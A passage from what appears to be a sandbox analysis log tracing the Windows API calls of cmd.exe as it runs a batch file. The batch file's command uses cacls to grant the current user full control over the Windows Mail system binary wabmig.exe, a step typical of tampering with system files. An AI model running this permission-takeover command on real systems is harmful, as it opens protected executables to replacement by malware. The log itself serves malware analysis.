out: hHeap=0x590000) returned 1 [0171.323] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0171.323] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0171.323] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0171.324] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0171.324] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0171.324] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0171.324] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0171.324] GetProcessHeap () returned 0x590000 [0171.324] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3120 [0171.324] GetProcessHeap () returned 0x590000 [0171.324] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x72) returned 0x5b2b10 [0171.326] GetProcessHeap () returned 0x590000 [0171.326] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x60) returned 0x5a3180 [0171.328] GetConsoleTitleW (in: lpConsoleTitle=0x30f398, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0171.329] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0171.329] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0171.329] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0171.330] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0171.330] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0171.330] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0171.330] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0171.330] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0171.330] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0171.330] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0171.330] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0171.330] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0171.330] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0171.330] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0171.330] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0171.330] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0171.330] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0171.330] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0171.330] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0171.330] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0171.331] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0171.331] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0171.331] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0171.331] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0171.331] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0171.331] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0171.331] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0171.331] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0171.331] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0171.331] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0171.331] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0171.331] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0171.331] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0171.331] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0171.331] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0171.331] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0171.332] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0171.332] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0171.332] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0171.332] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0171.332] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0171.332] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0171.332] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0171.332] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0171.332] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0171.332] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0171.332] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0171.332] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0171.332] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0171.332] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0171.332] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0171.332] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0171.332] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0171.613] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0171.614] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0171.614] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0171.614] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0171.614] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0171.614] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0171.614] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0171.614] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0171.614] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0171.614] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0171.614] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0171.614] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0171.614] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0171.614] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0171.614] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0171.615] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0171.615] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0171.615] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0171.615] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0171.615] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0171.615] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0171.615] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0171.615] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0171.615] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0171.615] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0171.615] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0171.615] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0171.615] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0171.615] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0171.615] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0171.616] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0171.616] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0171.616] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0171.616] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0171.616] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0171.616] GetProcessHeap () returned 0x590000 [0171.616] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x210) returned 0x5a31e8 [0171.616] GetProcessHeap () returned 0x590000 [0171.616] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xca) returned 0x5a3400 [0171.619] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0171.619] GetProcessHeap () returned 0x590000 [0171.619] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x418) returned 0x5907f0 [0171.619] SetErrorMode (uMode=0x0) returned 0x0 [0171.620] SetErrorMode (uMode=0x1) returned 0x0 [0171.620] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x5907f8, lpFilePart=0x30eeb8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x30eeb8*="Desktop") returned 0x25 [0171.620] SetErrorMode (uMode=0x0) returned 0x1 [0171.620] GetProcessHeap () returned 0x590000 [0171.620] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5907f0, Size=0x6e) returned 0x5907f0 [0171.620] GetProcessHeap () returned 0x590000 [0171.620] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5907f0) returned 0x6e [0171.620] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0171.621] GetProcessHeap () returned 0x590000 [0171.621] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x5a) returned 0x5a34d8 [0171.621] GetProcessHeap () returned 0x590000 [0171.621] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa8) returned 0x5a3540 [0171.621] GetProcessHeap () returned 0x590000 [0171.621] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a3540, Size=0x5a) returned 0x5a3540 [0171.621] GetProcessHeap () returned 0x590000 [0171.621] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a3540) returned 0x5a [0171.622] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0171.622] GetProcessHeap () returned 0x590000 [0171.622] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe0) returned 0x590868 [0171.633] GetProcessHeap () returned 0x590000 [0171.633] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x590868, Size=0x76) returned 0x590868 [0171.633] GetProcessHeap () returned 0x590000 [0171.633] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x590868) returned 0x76 [0171.633] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0171.634] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x30ec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ec54) returned 0x5a35a8 [0171.634] GetProcessHeap () returned 0x590000 [0171.634] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5a17e0 [0171.634] FindClose (in: hFindFile=0x5a35a8 | out: hFindFile=0x5a35a8) returned 1 [0171.634] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0171.634] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0171.634] GetConsoleTitleW (in: lpConsoleTitle=0x30f12c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0171.635] GetProcessHeap () returned 0x590000 [0171.635] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x11c) returned 0x5908e8 [0171.635] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0171.635] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0171.635] IdentifyCodeAuthzLevelW () returned 0x1 [0171.642] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0171.642] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0171.643] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0171.643] CloseCodeAuthzLevel () returned 0x1 [0171.643] SetErrorMode (uMode=0x0) returned 0x0 [0171.643] SetErrorMode (uMode=0x1) returned 0x0 [0171.643] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x5a31f0, lpFilePart=0x30f018 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x30f018*="Ch81ANBE.bat") returned 0x32 [0171.643] SetErrorMode (uMode=0x0) returned 0x1 [0171.643] GetProcessHeap () returned 0x590000 [0171.643] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x72) returned 0x5b2b90 [0171.643] wcsspn (_String=" \"C:\\Program Files\\Windows Mail\\wabmig.exe\"", _Control=" \x09") returned 0x1 [0171.643] GetProcessHeap () returned 0x590000 [0171.643] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x5e) returned 0x5910e8 [0171.643] GetProcessHeap () returned 0x590000 [0171.643] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb4) returned 0x591150 [0171.643] GetProcessHeap () returned 0x590000 [0171.643] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x591150, Size=0x60) returned 0x591150 [0171.643] GetProcessHeap () returned 0x590000 [0171.643] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x591150) returned 0x60 [0171.643] CmdBatNotification () returned 0x5a3252 [0171.643] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x30f05c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0171.644] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0171.644] _get_osfhandle (_FileHandle=3) returned 0x78 [0171.644] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.644] _get_osfhandle (_FileHandle=3) returned 0x78 [0171.644] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.644] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x30f040, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x30f040*=0xe2, lpOverlapped=0x0) returned 1 [0171.645] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0171.645] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0171.647] _get_osfhandle (_FileHandle=3) returned 0x78 [0171.647] GetFileType (hFile=0x78) returned 0x1 [0171.647] _get_osfhandle (_FileHandle=3) returned 0x78 [0171.647] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0171.647] GetProcessHeap () returned 0x590000 [0171.647] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5a6ac0 [0171.647] GetProcessHeap () returned 0x590000 [0171.647] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5b4af8 [0171.647] GetProcessHeap () returned 0x590000 [0171.647] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1a) returned 0x5a5810 [0171.648] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0171.648] GetProcessHeap () returned 0x590000 [0171.648] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5810 | out: hHeap=0x590000) returned 1 [0171.648] GetProcessHeap () returned 0x590000 [0171.648] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4af8 | out: hHeap=0x590000) returned 1 [0171.648] GetProcessHeap () returned 0x590000 [0171.648] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6ac0 | out: hHeap=0x590000) returned 1 [0171.649] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0171.649] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0171.649] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0171.649] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0171.649] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0171.649] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0171.649] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0171.649] GetProcessHeap () returned 0x590000 [0171.649] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5911b8 [0171.650] GetProcessHeap () returned 0x590000 [0171.650] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x59f4b8 [0171.655] GetProcessHeap () returned 0x590000 [0171.655] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa0) returned 0x591218 [0171.658] _tell (_FileHandle=3) returned 32 [0171.658] _close (_FileHandle=3) returned 0 [0171.658] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x30ee14 | out: _Buffer="\r\n") returned 2 [0171.659] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.659] GetFileType (hFile=0x7) returned 0x2 [0172.044] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.044] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30edd4 | out: lpMode=0x30edd4) returned 1 [0172.044] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.044] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30ee00, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30ee00*=0x2) returned 1 [0172.045] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0172.045] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0172.045] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x30ee10 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0172.045] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x30ee10 | out: _Buffer=">") returned 1 [0172.045] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.045] GetFileType (hFile=0x7) returned 0x2 [0172.045] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.046] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30edd8 | out: lpMode=0x30edd8) returned 1 [0172.046] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.046] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x30ee04, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x30ee04*=0x26) returned 1 [0172.047] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.047] GetFileType (hFile=0x7) returned 0x2 [0172.047] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.047] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f05c | out: lpMode=0x30f05c) returned 1 [0172.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.048] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x59f4c0*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x30f088, lpReserved=0x0 | out: lpBuffer=0x59f4c0*, lpNumberOfCharsWritten=0x30f088*=0x5) returned 1 [0172.048] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x30f094 | out: _Buffer=" \"C:\\Program Files\\Windows Mail\\wabmig.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 76 [0172.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.048] GetFileType (hFile=0x7) returned 0x2 [0172.049] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.049] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f054 | out: lpMode=0x30f054) returned 1 [0172.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.049] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x4c, lpNumberOfCharsWritten=0x30f080, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30f080*=0x4c) returned 1 [0172.049] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x30f0b4 | out: _Buffer="\r\n") returned 2 [0172.050] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.050] GetFileType (hFile=0x7) returned 0x2 [0172.050] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.050] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f074 | out: lpMode=0x30f074) returned 1 [0172.050] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.050] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30f0a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30f0a0*=0x2) returned 1 [0172.051] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0172.051] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0172.051] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0172.051] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0172.051] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0172.051] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0172.051] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0172.051] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0172.051] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0172.051] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0172.052] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0172.052] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0172.052] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0172.052] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0172.052] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0172.052] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0172.052] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0172.052] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0172.052] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0172.052] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0172.052] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0172.052] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0172.052] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0172.052] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0172.052] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0172.052] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0172.052] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0172.052] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0172.052] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0172.053] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0172.053] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0172.053] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0172.053] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0172.053] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0172.053] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0172.053] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0172.053] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0172.053] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0172.053] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0172.053] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0172.053] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0172.053] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0172.053] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0172.054] GetProcessHeap () returned 0x590000 [0172.054] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x418) returned 0x5a4160 [0172.054] SetErrorMode (uMode=0x0) returned 0x0 [0172.054] SetErrorMode (uMode=0x1) returned 0x0 [0172.054] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5a4168, lpFilePart=0x30ee58 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x30ee58*="Desktop") returned 0x25 [0172.054] SetErrorMode (uMode=0x0) returned 0x1 [0172.054] GetProcessHeap () returned 0x590000 [0172.055] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a4160, Size=0x60) returned 0x5a4160 [0172.055] GetProcessHeap () returned 0x590000 [0172.055] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a4160) returned 0x60 [0172.055] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.055] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0172.055] GetProcessHeap () returned 0x590000 [0172.055] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x120) returned 0x5a41c8 [0172.055] GetProcessHeap () returned 0x590000 [0172.055] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x238) returned 0x5a42f0 [0172.058] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.058] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x30ebd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ebd4) returned 0xffffffff [0172.058] GetLastError () returned 0x2 [0172.059] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x30ebd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ebd4) returned 0xffffffff [0172.059] GetLastError () returned 0x2 [0172.059] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.059] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x30ebd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ebd4) returned 0x5a44a0 [0172.059] GetProcessHeap () returned 0x590000 [0172.059] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a17e0, Size=0x4) returned 0x5a17e0 [0172.059] FindClose (in: hFindFile=0x5a44a0 | out: hFindFile=0x5a44a0) returned 1 [0172.060] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x30ebd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ebd4) returned 0xffffffff [0172.060] GetLastError 